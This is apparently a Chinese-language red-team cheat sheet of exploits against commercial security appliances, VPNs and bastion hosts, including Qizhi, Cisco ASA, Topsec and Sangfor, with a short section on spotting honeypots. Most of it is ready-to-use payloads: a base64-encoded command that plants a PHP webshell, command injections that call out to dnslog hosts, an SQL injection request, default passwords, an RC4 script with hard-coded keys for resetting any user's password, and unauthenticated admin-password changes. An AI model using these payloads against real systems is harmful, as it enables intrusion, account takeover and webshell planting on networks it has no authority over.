本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
齐治堡垒机
-
默认口令
- shterm/shterm
-
齐治堡垒机 ShtermClient-2.1.1 命令执行漏洞
- 齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
http://10.20.10.11/listener/cluster_manage.php https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS} /var/www/shterm/resources/qrcode/lbj77.php 密码10086
- 齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)分析
-
CNVD-2019-20835 齐治堡垒机前台远程命令执行漏洞
-
CNVD-2019-17294 齐治堡垒机后台存在命令执行漏洞
-
远程代码执行
- POC | Payload | exp
POST /shterm/listener/tui_update.php a=["t';import os;os.popen('whoami')#"]
- POC | Payload | exp
相关文章
相关工具
- BeichenDream/WhetherMysqlSham - 检测目标 Mysql 数据库是不是蜜罐,获取目标数据库详细信息
- Monyer/antiHoneypot - 一个拦截蜜罐 XSSI 的 Chrome 扩展
从蓝队溯源角度出发
- 分析样本
- PC 名称
- 语言
- 常用函数、方法
- 注释习惯、变量名习惯
- 前端漏洞反制
- 浏览器记录、书签、cookie 等
- 验证码、手机号、邮箱
- 攻击时间段
- 后渗透反制
- 钓鱼文件
- ntlm中继
- Rogue MySql Server
从红队角度出发
- 前台
- 不支持正常浏览器,仅老版 IE
- 仅支持老版本 flash
- 不正常的 JS 文件,js 混淆
- 仅 json 文件, 内含指纹
- XSS、JSONP
- 大量网络请求
- 同站同 CMS 不同页面不同时间、CMS 版本
- 任意口令登陆?
- 要求实名认证、或手机号注册
- 后渗透
- 第二次登陆后发现 history 记录全部清空
- 开放了大量端口
- docker 容器且无正常业务数据
- 例如 cat /proc/meminfo 这个命令无论执行多少次得到的内容都是不变的,而这真实的系统中是不可能的。
文章
绿盟 UTS 综合威胁探针
- 管理员任意登录
- POC | Payload | exp
Cisco ASA
-
CVE-2018-0296 Cisco ASA Directory Traversal
- POC | Payload | exp
-
CVE-2020-3452
- POC | Payload | exp
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
- POC | Payload | exp
Sophos XG
- CVE-2020-12271 && CVE-2020-15504
绿盟 waf 封禁绕过s
- XFF伪造字段地址为127.0.0.1,导致waf上看不见攻击者地址
上海格尔安全认证网关管理系统
Citrix ADC
- CVE-2019-19781 Citrix Gateway/ADC 远程代码执行漏洞
-
文章
-
POC | Payload | exp
-
F5 BIG-IP ADC
- CVE-2020-5902 F5 BIG-IP 远程代码执行漏洞
天融信 Top-app LB
-
SQL注入漏洞
- POC | Payload | exp
- 天融信Top-app LB负载均衡SQL注入漏洞
POST /acc/clsf/report/datasource.php HTTP/1.1 Host: Connection: close Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-Version: 1.6.0.3 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57 Content-Type: application/x-www-form-urlencoded Content-Length: 201 t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- &o=r_Speed&gid=0&lmt=10&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=
- 天融信Top-app LB负载均衡SQL注入漏洞
- POC | Payload | exp
-
未授权
- POC | Payload | exp
- 天融信负载均衡TopApp-LB系统无需密码直接登陆
登录框 ; ping xxx.dnslog.info; echo
- 天融信负载均衡TopApp-LB系统无需密码直接登陆
- POC | Payload | exp
-
RCE
- POC | Payload | exp
- 天融信TopApp-LB负载均衡命令执行漏洞大量设备可被通杀
用户名随意 密码:;id
- 天融信TopApp-LB负载均衡命令执行漏洞大量设备可被通杀
- POC | Payload | exp
Fortigate SSL VPN
- CVE-2018-13379 Fortigate SSL VPN 密码读取
- CVE-2018-13382 Fortigate SSL VPN 任意密码重置
Palo_Alto SSL VPN
- CVE-2019-1579 Palo Alto GlobalProtect 远程代码执行漏洞
Pulse_Secure SSL VPN
-
CVE-2019-11510 Pulse Secure SSL VPN 任意文件读取漏洞
-
文章
-
POC | Payload | exp
-
-
CVE-2019-11539 Pulse Secure SSL VPN 远程代码执行漏洞
深信服 VPN
-
口令爆破
- POC | Payload | exp
- https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633
用户登录,若多次尝试登陆失败会要求输入验证码,若输入错误的验证码,会提示“校验码错误或校验码已过期”;修改登录请求的数据包,清空cookie和验证码字段的值即可绕过验证码,此时提示“用户名或密码错误”。 /por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=
- https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633
- POC | Payload | exp
-
短信绕过
- POC | Payload | exp
POST https://路径/por/changetelnum.csp?apiversion=1 newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1
- POC | Payload | exp
-
任意密码重置
- POC | Payload | exp
某VPN加密算法使用了默认的key,攻击者构利用key构造重置密码数据包从而修改任意用户的密码 利用:需要登录账号 M7.6.6R1版本key为20181118 M7.6.1key为20100720 POST /por/changepwd.csp sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN(脚本计算后结果)from Crypto.Cipher import ARC4 from binascii import a2b_hex def myRC4(data, key): rc41= ARC4.new(key) encrypted =rc41.encrypt(data) return encrypted. encode('hex') def rc4_decrpt_hex(data, key): rc41= ARC4. new(key) return rc41. decrypt(a2b_hex(data)) key= '20100720' data = r',username-TARGET_USERNAME, ip-127.0.0.1,grpid-1, pripsw-suiyi , newpsw=TARGET PASSWORD,' print myRC4(data, key)
- POC | Payload | exp
-
RCE
- POC | Payload | exp
https://x.com/por/checkurl.csp?url=-h|curl `whoami`.xxxx.dnslog.cn&retry=1&timeout=1
- POC | Payload | exp
相关文章
利用杀毒软件删除任意文件
白名单信任文件
- 相关文章
深信服 EDR
-
2020.08命令执行
- 相关文章
- POC | Payload | exp
-
2020.09命令执行
- POC | Payload | exp
POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 {"params":"w=123\"'1234123'\"|命令"}
- POC | Payload | exp
天融信数据防泄漏系统
- 越权修改管理员密码
无需登录权限,由于修改密码处未校验原密码,且 /?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。 默认 superman 账户 uid 为 1。 POST /?module=auth_user&action=mod_edit_pwd Cookie: username=superman; uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1